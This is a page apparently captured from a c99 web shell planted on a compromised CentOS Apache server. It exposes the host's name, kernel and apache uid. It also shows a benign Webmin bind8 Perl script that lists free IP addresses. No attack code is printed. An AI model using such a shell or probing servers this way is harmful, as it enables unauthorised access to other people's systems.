!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/bind8/   drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)


Viewing file:     free_chooser.cgi (1.77 KB)      -rwxr-xr-x
#!/usr/bin/perl
# Show a list of free IP addresses, within the configured ranges

require './bind8-lib.pl';

# Scan every zone, both inside views and at the top level of the config,
# and build two lookup tables from the master zone files:
#   %taken - addresses that already appear in an A or PTR record
#   %nets  - networks (address with trailing digits replaced by 0) seen in A records
$conf = &get_config();
@views = &find("view", $conf);
foreach my $view_dir (@views) {
    @vz = &find("zone", $view_dir->{'members'});
    # Remember which view each of these zones was found in
    foreach my $vzone (@vz) {
        $view{$vzone} = $view_dir;
        }
    push(@zones, @vz);
    }
push(@zones, &find("zone", $conf));
foreach my $zone (@zones) {
    # Zones whose type is anything other than "master" are skipped
    next unless (&find_value("type", $zone->{'members'}) eq "master");
    my $zone_file = &find_value("file", $zone->{'members'});
    foreach my $rec (&read_zone_file($zone_file, $zone->{'value'})) {
        my $rtype = $rec->{'type'};
        if ($rtype eq 'A') {
            my $addr = $rec->{'values'}->[0];
            $taken{$addr}++;
            # Derive the network by replacing the trailing digits with 0;
            # the loopback network is never offered as a candidate
            (my $network = $addr) =~ s/\d+$/0/;
            $nets{$network}++ unless ($network eq "127.0.0.0");
            }
        elsif ($rtype eq 'PTR') {
            # Reverse records also mark an address as in use
            $taken{&arpa_to_ip($rec->{'values'}->[0])}++;
            }
        }
    }

# Networks listed in the module configuration take precedence; only when
# none are configured do we fall back to the networks discovered in the
# zone files. The result is ordered by plain string comparison.
@nets = $config{'free_nets'} ? split(/\s+/, $config{'free_nets'})
                             : keys %nets;
@nets = sort @nets;

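# Display the list of free IPs in the selected networks.
#
# Each address printed below is interpolated into HTML and into an inline
# JavaScript handler without escaping, and the network specs in @nets come
# from zone file records or the module configuration, neither of which is
# guaranteed to be well formed. Every spec is therefore validated as
# strictly numeric before anything is emitted, and malformed ones are
# skipped.
&popup_header($text{'free_title'});
print <<'EOF';
<script>
function select(f)
{
top.opener.ifield.value = f;
top.close();
return false;
}
</script>
EOF
print &ui_columns_start([ $text{'free_ip'} ], 100);
foreach my $net (@nets) {
    my @netip = split(/\./, $net);

    # Require exactly four dot-separated fields, the first three being
    # plain octets in 0..255, so nothing but digits and dots reaches the
    # markup below
    next if (@netip != 4);
    next if (grep { !/^\d{1,3}$/ || $_ > 255 } @netip[0..2]);

    # The last field selects the host range: "0" means the whole network
    # (1..255, as before), "N-M" an explicit range, and a bare number a
    # single address
    my ($start, $end);
    if ($netip[3] eq "0") {
        ($start, $end) = (1, 255);
        }
    elsif ($netip[3] =~ /^(\d+)\-(\d+)$/) {
        ($start, $end) = ($1, $2);
        }
    elsif ($netip[3] =~ /^\d+$/) {
        $start = $end = $netip[3];
        }
    else {
        # A non-numeric last field compares as 0 <= 0 forever once ++
        # switches to string increment, so the loop below would never end
        next;
        }

    # Never walk past the last possible octet, however large the
    # configured range is
    $end = 255 if ($end > 255);

    for(my $d=$start; $d<=$end; $d++) {
        my $ip = "$netip[0].$netip[1].$netip[2].$d";
        if (!$taken{$ip}) {
            print &ui_columns_row([ "<a href=\"\" onClick='return select(\"$ip\")'>$ip</a>" ]);
            }
        }
    }
print &ui_columns_end();
&popup_footer();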


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0131 ]--